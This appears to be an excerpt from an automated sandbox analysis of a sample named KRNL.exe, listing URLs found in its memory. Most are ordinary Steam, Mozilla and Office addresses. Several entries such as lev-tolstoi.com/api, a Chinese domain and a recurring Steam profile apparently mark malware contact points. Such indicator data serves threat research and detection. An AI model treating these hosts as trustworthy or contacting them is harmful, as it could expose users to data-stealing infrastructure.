                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/6
                    Source: KRNL.exe, 00000002.00000003.1765217238.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751947129.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/?
                    Source: KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/GY
                    Source: KRNL.exe, 00000002.00000003.1821721499.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749014529.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751935463.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749121760.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749066035.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976693796.000000000338B000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.0000000003366000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915873605.000000000338C000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiS
                    Source: KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                    Source: KRNL.exe, 00000002.00000003.1751845531.00000000033EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiul
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/k
                    Source: KRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m/S
                    Source: KRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi#
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampK
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.ah
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaizedk
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: KRNL.exe, 00000002.00000003.1712083330.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: KRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: KRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: KRNL.exeString found in binary or memory: https://www.entrust.net/rpa0
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
